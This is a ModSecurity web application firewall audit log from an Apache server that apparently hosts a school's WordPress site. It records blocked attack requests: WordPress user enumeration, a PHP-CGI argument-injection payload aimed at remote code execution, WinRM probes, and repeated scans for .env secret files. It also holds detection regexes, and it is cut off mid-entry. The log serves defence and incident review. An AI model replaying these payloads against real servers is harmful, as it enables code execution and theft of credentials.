[client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749908628995617 3395 (- - -) Stopwatch2: 1749908628995617 3395; combined=1479, p1=521, p2=925, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4c1fb15-Z-- --8de2930c-A-- [14/Jun/2025:20:55:12 +0700] aE1_QGmwZ6YUkjOdtI4McgAAAAs 103.236.140.4 52574 103.236.140.4 8181 --8de2930c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.113.153.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.113.153.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8de2930c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8de2930c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749909312029247 3561 (- - -) Stopwatch2: 1749909312029247 3561; combined=1530, p1=491, p2=1002, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8de2930c-Z-- --c2821a54-A-- [14/Jun/2025:21:02:01 +0700] aE2A2V3g_boun6Rx5jILYAAAANE 103.236.140.4 52608 103.236.140.4 8181 --c2821a54-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.10.250.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.10.250.218 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --c2821a54-C-- --c2821a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2821a54-E-- --c2821a54-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749909721877145 4435 (- - -) Stopwatch2: 1749909721877145 4435; combined=2629, p1=562, p2=1991, p3=0, p4=0, p5=76, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2821a54-Z-- --514aa61b-A-- [14/Jun/2025:21:58:45 +0700] aE2OJWIDXuKmWNi2UBTxUgAAAEI 103.236.140.4 52898 103.236.140.4 8181 --514aa61b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.224.173.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.224.173.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --514aa61b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --514aa61b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749913125927107 3564 (- - -) Stopwatch2: 1749913125927107 3564; combined=1532, p1=496, p2=998, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --514aa61b-Z-- --b60b5966-A-- [14/Jun/2025:22:29:54 +0700] aE2VcmmwZ6YUkjOdtI4MqgAAAAE 103.236.140.4 53062 103.236.140.4 8181 --b60b5966-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.112.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.112.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b60b5966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b60b5966-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749914994795309 2700 (- - -) Stopwatch2: 1749914994795309 2700; combined=1125, p1=383, p2=709, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b60b5966-Z-- --2962c052-A-- [14/Jun/2025:22:49:55 +0700] aE2aI2mwZ6YUkjOdtI4MsQAAAAs 103.236.140.4 53162 103.236.140.4 8181 --2962c052-B-- POST /wsman HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 101.251.238.174 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 101.251.238.174 X-Forwarded-Proto: http Connection: close Content-Length: 0 Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw== Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client --2962c052-C-- --2962c052-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2962c052-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749916195841582 4313 (- - -) Stopwatch2: 1749916195841582 4313; combined=2647, p1=577, p2=1974, p3=29, p4=33, p5=33, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2962c052-Z-- --d7306b20-A-- [14/Jun/2025:22:49:59 +0700] aE2aJ0MWfhkd5Y0sFtotEgAAAJM 103.236.140.4 53164 103.236.140.4 8181 --d7306b20-B-- POST /wsman HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 101.251.238.174 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 101.251.238.174 X-Forwarded-Proto: http Connection: close Content-Length: 198 Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client WSMANIDENTIFY: unauthenticated --d7306b20-C-- --d7306b20-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7306b20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749916199310967 4887 (- - -) Stopwatch2: 1749916199310967 4887; combined=3119, p1=658, p2=2346, p3=37, p4=42, p5=35, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7306b20-Z-- --137ee467-A-- [14/Jun/2025:23:14:44 +0700] aE2f9GmwZ6YUkjOdtI4MwgAAAAw 103.236.140.4 53290 103.236.140.4 8181 --137ee467-B-- GET /.env HTTP/1.0 Referer: https://google.com Host: 103.236.140.4 X-Real-IP: 173.212.223.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.212.223.233 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 --137ee467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --137ee467-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749917684645379 799 (- - -) Stopwatch2: 1749917684645379 799; combined=287, p1=253, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --137ee467-Z-- --def1e640-A-- [14/Jun/2025:23:25:26 +0700] aE2idmIDXuKmWNi2UBTxdwAAAFE 103.236.140.4 53334 103.236.140.4 8181 --def1e640-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.157.194.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.157.194.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --def1e640-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --def1e640-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749918326534408 2866 (- - -) Stopwatch2: 1749918326534408 2866; combined=1430, p1=468, p2=929, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --def1e640-Z-- --76d8bd6e-A-- [14/Jun/2025:23:52:54 +0700] aE2o5l3g_boun6Rx5jIL0wAAAM0 103.236.140.4 53482 103.236.140.4 8181 --76d8bd6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.131.234.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.131.234.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --76d8bd6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d8bd6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749919974789186 2312 (- - -) Stopwatch2: 1749919974789186 2312; combined=1080, p1=378, p2=675, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d8bd6e-Z-- --13408b71-A-- [15/Jun/2025:00:27:36 +0700] aE2xCGIDXuKmWNi2UBTxhQAAAFI 103.236.140.4 53630 103.236.140.4 8181 --13408b71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1 --13408b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13408b71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922056970555 846 (- - -) Stopwatch2: 1749922056970555 846; combined=347, p1=305, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13408b71-Z-- --66f54022-A-- [15/Jun/2025:00:27:37 +0700] aE2xCWmwZ6YUkjOdtI4M3QAAABU 103.236.140.4 53632 103.236.140.4 8181 --66f54022-B-- GET /.env_s3 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G930T Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 --66f54022-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66f54022-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922057520325 765 (- - -) Stopwatch2: 1749922057520325 765; combined=295, p1=260, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66f54022-Z-- --5fd39251-A-- [15/Jun/2025:00:27:37 +0700] aE2xCWIDXuKmWNi2UBTxhgAAAFY 103.236.140.4 53634 103.236.140.4 8181 --5fd39251-B-- GET /.env.rc HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36 OPR/48.0.2685.7 --5fd39251-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fd39251-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922057960818 662 (- - -) Stopwatch2: 1749922057960818 662; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fd39251-Z-- --2f3f9b6b-A-- [15/Jun/2025:00:27:38 +0700] aE2xCl3g_boun6Rx5jIL5QAAAMg 103.236.140.4 53636 103.236.140.4 8181 --2f3f9b6b-B-- GET /.env0.2 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 OPR/41.0.2353.69 --2f3f9b6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f3f9b6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922058514552 906 (- - -) Stopwatch2: 1749922058514552 906; combined=353, p1=309, p2=0, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f3f9b6b-Z-- --6a93ce45-A-- [15/Jun/2025:00:27:39 +0700] aE2xC2IDXuKmWNi2UBTxhwAAAFQ 103.236.140.4 53638 103.236.140.4 8181 --6a93ce45-B-- GET /.env0.1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Safari/531.9 --6a93ce45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a93ce45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922059201083 723 (- - -) Stopwatch2: 1749922059201083 723; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a93ce45-Z-- --38700964-A-- [15/Jun/2025:00:27:40 +0700] aE2xDGIDXuKmWNi2UBTxigAAAEA 103.236.140.4 53644 103.236.140.4 8181 --38700964-B-- GET /ssl/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 --38700964-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38700964-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922060745225 665 (- - -) Stopwatch2: 1749922060745225 665; combined=275, p1=243, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38700964-Z-- --88d0172f-A-- [15/Jun/2025:00:27:41 +0700] aE2xDUMWfhkd5Y0sFtotKgAAAJI 103.236.140.4 53648 103.236.140.4 8181 --88d0172f-B-- GET /win/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 --88d0172f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88d0172f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922061939634 652 (- - -) Stopwatch2: 1749922061939634 652; combined=263, p1=234, p2=0, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88d0172f-Z-- --3ddaff13-A-- [15/Jun/2025:00:27:42 +0700] aE2xDmIDXuKmWNi2UBTxjAAAAEQ 103.236.140.4 53650 103.236.140.4 8181 --3ddaff13-B-- GET /venv.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-T815 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Safari/537.36 --3ddaff13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ddaff13-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749922062514587 1565 (- - -) Stopwatch2: 1749922062514587 1565; combined=649, p1=311, p2=311, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ddaff13-Z-- --f63b7b04-A-- [15/Jun/2025:00:27:42 +0700] aE2xDl3g_boun6Rx5jIL5gAAAMQ 103.236.140.4 53652 103.236.140.4 8181 --f63b7b04-B-- GET /zzz/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 --f63b7b04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f63b7b04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922062957018 688 (- - -) Stopwatch2: 1749922062957018 688; combined=292, p1=256, 